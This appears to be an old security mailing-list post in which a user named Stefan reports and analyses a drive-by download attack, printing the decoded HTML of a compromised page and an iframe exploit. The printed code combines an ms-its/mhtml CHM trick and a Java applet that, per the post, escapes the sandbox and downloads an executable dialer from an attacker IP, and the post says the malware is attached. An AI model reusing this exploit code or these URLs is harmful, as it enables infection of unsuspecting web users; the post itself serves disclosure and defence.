Hi People,
before reading this,
dont go on any of the sites
unless you are sure ;)
after decrypting some stuff, this is the source from:
http://xxl-size.com/cogo.html
-------------------------------------
<iframe src="http://209.8.20.130/dl/adv346.php";>
<iframe src="http://www.awmcash.biz/adverts/14/1.htm";>
-------------------------------------
this is the source from one of the iframes
(http://209.8.20.130/dl/adv346.php):
----------------------------------------------------
<html><head>
</head><body>
<textarea id="cxw" style="display:none;">
<object data="${PR}" type="text/x-scriptlet"></object>
</textarea>
<script language="javascript">
document.write(cxw.value.replace(/\${PR}/g,'ms-its:mhtml:file://c:\\nosuch.mht!http://209.8.20.130/dl/adv346/x.chm::/x.htm'));
</script>
<applet width=1 height=1 ARCHIVE=loaderadv346.jar
code=Counter></APPLET></body></html>
----------------------------------------------------
the jar archive loaderadv346.jar contains some java classes
which exploits the URLClassLoader bug (BlackBox.class).
it overrides the sandbox and downloads a loadadv346.exe from:
http://209.8.20.130/dl/loadadv346.exe
this seems to be a dialer or something like this,
it changes the hosts file, creates some spawn files,
you can look for yourself, i included the file
and the java stuff, the loadadv is upx'd,
so far, anyone knows how to protect from this crap?
you're welcome to send some solutions ;)
cya, StefanAttachment:
loaderadv.zip
Description: Zip compressed data